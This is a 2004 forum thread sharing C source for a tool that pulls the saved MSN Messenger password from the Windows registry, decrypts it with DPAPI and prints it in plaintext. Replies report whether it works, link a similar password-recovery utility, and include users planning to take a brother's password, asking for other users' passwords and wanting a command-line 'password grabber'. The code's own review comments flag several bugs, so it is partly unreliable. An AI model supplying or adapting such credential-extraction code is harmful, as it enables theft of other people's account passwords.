
Skydriver
Hi all

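The attached tool allows you to decrypt the MSN Messenger password stored
on your computer. The tool cannot be used on passwords stored on
other computers, as the decryption algorithm relies on the computer's
internal certificate for decryption. [Note: the code below calls the Windows
DPAPI function CryptUnprotectData, whose keys are tied to the logged-on
Windows user rather than to a certificate, so any program running as that
user can read back a password the client has saved.]

enjoy and be careful wink.gif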


****************************************************************

/* MSNMessenger DPAPI
*
* tombkeeper[0x40]nsfocus[0x2e]com
* tombkeeper[0x40]xfocus[0x2e]net
* 2004.08.11
*/

#include <Windows.h>


#pragma comment(lib, "Advapi32.lib")

/*
 * FCHK(expr): evaluate expr; when it is false, print the stringified
 * expression followed by " failed" and return 0 from the enclosing function.
 * NOTE(review): the expansion is a bare if-statement (not do { } while (0)),
 * and the 0 it returns is the same value main() returns on success, so a
 * caller of the program cannot tell the two outcomes apart by exit code.
 */
#define FCHK(a) if (!(a)) {printf(#a " failed\n"); return 0;}

/*
 * Local copies of the DPAPI data types, declared here so the program can call
 * CryptUnprotectData through a pointer resolved at run time.
 * NOTE(review): the Windows SDK declares the same names in wincrypt.h; whether
 * Windows.h pulls that header in depends on the build settings -- confirm
 * these do not end up as redefinitions.
 */
typedef struct _CRYPTOAPI_BLOB {
DWORD cbData; /* number of bytes at pbData */
BYTE* pbData; /* pointer to the data bytes */
} DATA_BLOB;

/* Prompt description for DPAPI calls; main() always passes NULL for it. */
typedef struct _CRYPTPROTECT_PROMPTSTRUCT {
DWORD cbSize;
DWORD dwPromptFlags;
HWND hwndApp;
LPCWSTR szPrompt;
} CRYPTPROTECT_PROMPTSTRUCT, *PCRYPTPROTECT_PROMPTSTRUCT;

/* Function-pointer type matching the parameter list used for CryptUnprotectData below. */
typedef BOOL (WINAPI *PCryptUnprotectData)(
DATA_BLOB* pDataIn,
LPWSTR* ppszDataDescr,
DATA_BLOB* pOptionalEntropy,
PVOID pvReserved,
CRYPTPROTECT_PROMPTSTRUCT* pPromptStruct,
DWORD dwFlags,
DATA_BLOB* pDataOut
);

/* Filled in by main() via GetProcAddress; NULL until then. */
PCryptUnprotectData CryptUnprotectData = NULL;


/*
 * Reads the saved MSN Messenger credential value from the current user's
 * registry hive, passes it to DPAPI's CryptUnprotectData, base64-decodes the
 * result and prints it.
 *
 * Security-relevant reading: the DPAPI call is made with no optional entropy
 * and no prompt, so nothing beyond running as the logged-on user is needed to
 * unprotect the value. A client that saves a password this way is only as
 * safe as every other program in that user's session.
 *
 * Returns 1 when either registry call fails (nothing is printed), and 0 both
 * on success and when an FCHK check fails.
 */
int main(void)
{
int ret;
HMODULE hNtdll; /* holds the Crypt32.dll handle despite the name */

HKEY hKey;
DWORD dwType;
char Data[0x100] = {0}; /* reused: first the protected blob, later the decoded text */
DWORD dwSize; /* NOTE(review): never initialized before RegQueryValueEx reads it */

DATA_BLOB DataIn;
DATA_BLOB DataOut; /* NOTE(review): left uninitialized if the unprotect call fails */

/* Open the per-user MSN Messenger settings key read-only. */
ret = RegOpenKeyEx
(
HKEY_CURRENT_USER,
"Software\\Microsoft\\MSNMessenger",
0,
KEY_READ,
&hKey
);
if( ret != ERROR_SUCCESS ) return 1;

/*
 * Fetch the protected value into Data.
 * NOTE(review): the last argument is in/out -- the API expects it to hold the
 * capacity of Data on entry. Here it holds stack garbage, so the call can fail
 * spuriously or be told the 0x100-byte buffer is larger than it is.
 */
ret = RegQueryValueEx
(
hKey,
"Password.NET Messenger Service",
NULL,
&dwType,
Data,
&dwSize
);
/* NOTE(review): hKey is never closed on this or any later path. */
if( ret != ERROR_SUCCESS ) return 1;

/* Resolve CryptUnprotectData at run time instead of linking Crypt32.lib. */
FCHK ((hNtdll = LoadLibrary ("Crypt32.dll")) != NULL);
FCHK ((CryptUnprotectData = (PCryptUnprotectData)
GetProcAddress (hNtdll, "CryptUnprotectData")) != NULL);

DataIn.pbData = Data + 2; // skips the first two bytes of the value; their meaning is not shown here (TODO confirm)
DataIn.cbData = dwSize-2; /* NOTE(review): wraps to a huge DWORD if dwSize < 2 */

/*
 * Arguments in order: input blob, no description out, no optional entropy,
 * reserved, no prompt struct, flags = 1 (the value of
 * CRYPTPROTECT_UI_FORBIDDEN), output blob.
 * NOTE(review): the BOOL result is discarded, so a failed call falls through
 * to the code below with DataOut holding indeterminate values.
 */
CryptUnprotectData
(
&DataIn,
NULL,
NULL,
NULL,
NULL,
1,
&DataOut
);

/*
 * NOTE(review): several hazards on these two lines:
 *  - base64_decode is used before any declaration of it is visible;
 *  - strlen() assumes DataOut.pbData is NUL-terminated, while the blob's real
 *    length is DataOut.cbData;
 *  - the third argument is meant to be the capacity of the target (Data,
 *    0x100 bytes) but the source length is passed instead;
 *  - the decoder's return value is ignored and Data is printed with %s without
 *    being terminated at the decoded length;
 *  - DataOut.pbData is not released and the plaintext is not wiped.
 */
base64_decode (DataOut.pbData, Data, strlen(DataOut.pbData));
printf ( "MSN Password: %s\n", Data);
return 0;
}

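//copied from GNU libc - libc/resolv/base64.c
/*
 * Decode the NUL-terminated base64 text in src.
 *
 * src      - base64 text; whitespace is skipped anywhere, '=' starts padding.
 * target   - output buffer, or NULL to validate and count without storing.
 * targsize - capacity of target in bytes (not consulted when target is NULL).
 *
 * Returns the number of decoded bytes, or -1 when src contains a character
 * outside the alphabet, has malformed padding, carries non-zero leftover bits,
 * or does not fit in target. Because the carry bits of a partial group are
 * parked in target[tarindex + 1], the buffer must have room for one byte past
 * the decoded data whenever a group is split across output bytes.
 */
int base64_decode (char const *src, char *target, size_t targsize)
{
    static const char Base64[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    static const char Pad64 = '=';

    int tarindex = 0;
    int state = 0;      /* position inside the current 4-character group */
    int ch;
    const char *pos;

    while ((ch = *src++) != '\0')
    {
        /*
         * <ctype.h> functions are only defined for unsigned char values and
         * EOF; plain char may be negative for bytes >= 0x80, so convert first.
         */
        if (isspace ((unsigned char) ch))   /* Skip whitespace anywhere. */
            continue;

        if (ch == Pad64)
            break;

        pos = strchr (Base64, ch);
        if (pos == NULL)                    /* A non-base64 character. */
            return (-1);

        switch (state)
        {
        case 0:
            if (target)
            {
                if ((size_t) tarindex >= targsize)
                    return (-1);
                target[tarindex] = (pos - Base64) << 2;
            }
            state = 1;
            break;
        case 1:
            if (target)
            {
                if ((size_t) tarindex + 1 >= targsize)
                    return (-1);
                target[tarindex] |= (pos - Base64) >> 4;
                target[tarindex + 1] = ((pos - Base64) & 0x0f) << 4;
            }
            tarindex++;
            state = 2;
            break;
        case 2:
            if (target)
            {
                if ((size_t) tarindex + 1 >= targsize)
                    return (-1);
                target[tarindex] |= (pos - Base64) >> 2;
                target[tarindex + 1] = ((pos - Base64) & 0x03) << 6;
            }
            tarindex++;
            state = 3;
            break;
        case 3:
            if (target)
            {
                if ((size_t) tarindex >= targsize)
                    return (-1);
                target[tarindex] |= (pos - Base64);
            }
            tarindex++;
            state = 0;
            break;
        default:
            abort ();
        }
    }

    /*
     * We are done decoding Base-64 chars. Let's see if we ended
     * on a byte boundary, and/or with erroneous trailing characters.
     */

    if (ch == Pad64)
    {                           /* We got a pad char. */
        ch = *src++;            /* Skip it, get next. */
        switch (state)
        {
        case 0:                 /* Invalid = in first position */
        case 1:                 /* Invalid = in second position */
            return (-1);

        case 2:                 /* Valid, means one byte of info */
            /* Skip any number of spaces. */
            for (; ch != '\0'; ch = *src++)
                if (!isspace ((unsigned char) ch))
                    break;
            /* Make sure there is another trailing = sign. */
            if (ch != Pad64)
                return (-1);
            ch = *src++;        /* Skip the = */
            /* Fall through to "single trailing =" case. */
            /* FALLTHROUGH */

        case 3:                 /* Valid, means two bytes of info */
            /*
             * We know this char is an =. Is there anything but
             * whitespace after it?
             */
            for (; ch != '\0'; ch = *src++)
                if (!isspace ((unsigned char) ch))
                    return (-1);

            /*
             * Now make sure for cases 2 and 3 that the "extra"
             * bits that slopped past the last full byte were
             * zeros. If we don't check them, they become a
             * subliminal channel.
             */
            if (target && target[tarindex] != 0)
                return (-1);
        }
    }
    else
    {
        /*
         * We ended by seeing the end of the string. Make sure we
         * have no partial bytes lying around.
         */
        if (state != 0)
            return (-1);
    }

    return (tarindex);
}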
Ecko
hehe *lol* funny smile.gif catched my password huh.gif

compiled version attached smile.gif
mrBob
it doesn't do anything at my pc unsure.gif
does it work with msn 6.2 too?
i can't find the registry value (manually) where the program looks for
and i know that i got my pass stored on my pc tongue.gif
ZoraX
Lol, ill try to get my brother's password:p
Serhat
hmm used the compiled one and compiled it myself.. both result is .. output is nothing..
Maybe I am doing something weird.. there is an cached password on this PC.. I know =)
My brother got his.. and I already know his pass... so just want to test it out wink.gif

Serhat
axelfoley643
mmm, it doesn't work for me huh.gif
nuorder
looks good, not at a computer with MSN ATM but will try it later

for those who want to retrieve their MSN password and others, use the nirsoft tool at
hxxp://freehost14.websamba.com/nirsoft/utils/mspass.html
tested it against MSN 6.2 and got a password
flashb4ck
thx for this link @ nuorder wink.gif


gr€€tz fL4Shb4Ck
Serhat
QUOTE (nuorder @ Aug 19 2004, 01:18 AM)
looks good, not at a computer with MSN ATM but will try it later

for those who want to retrieve their MSN password and others, use the nirsoft tool at
hxxp://freehost14.websamba.com/nirsoft/utils/mspass.html
tested it against MSN 6.2 and got a password

yeah it works perfectly.. same I couldn't find any info in the HELP file about command line switches...
Still a good tool.. ty smile.gif

Serhat
Tool
It didn't work here..maybe because i still got 6.1
..
nuorder
this program is referring to the key "Password.NET Messenger Service" under HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger
i cant see this key in the registry so im guessing that either windows hides this key and the nirsoft tool has a workaround or it really isnt there and it is accessed by other means
regmon shows the nirsoft tool is trying to access it but fails, didnt test it with the program in this thread because it doesnt work anyway.

if the decryption method is the same just gotta find the right regkey now i guess or a way to access "Password.NET Messenger Service" if it really is there. i think old versions you could see it

and probably the reason why it exits and displays nothing is that this segment of code
CODE
   /*
    * Fragment quoted from main() in the listing above: it asks the registry
    * for the "Password.NET Messenger Service" value and stores the status in
    * ret. Any status other than ERROR_SUCCESS makes main() return 1 at once,
    * before anything is printed, so the status alone does not say why the
    * call failed.
    */
   ret = RegQueryValueEx
   (
       hKey,
       "Password.NET Messenger Service",
       NULL,
       &dwType,
       Data,
       &dwSize
   );
   if( ret != ERROR_SUCCESS ) return 1;

returns an error because the key is not found so the program exits
cagontoo
it works on 6.2 tested
StreetZone_
is there possible to get other users password ?
M4Z3R
Very nice work, I must get learning the windows.h header use; thx for the tool smile.gif
Max_Payne
tested here and works 100% even with msn 6.2 translated
Serhat
QUOTE (Max_Payne @ Sep 21 2004, 04:18 PM)
tested here and works 100% even with msn 6.2 translated

msn 6.2 translated...
the language is included in the msgslang.dll file.. and because the password isn't saved in there as stated above it's normal that it will find it with every languages.. cause simply it stores the password @ the same place @ every language with msn

Serhat
boshcash
doesnt work here i need this tool working right now ohmy.gif

its very important to me also nirsoft tool is working i c my pass but its GUI i need a working command line msn password grabber guys !!!
320X
rlzs! it works with version 6.2
boshcash
guys who have sp2 xp did this cmd line prog work ?

and guys who had it worked with them do u have winxp not sp2

i wanna know to see why it doesnt work :S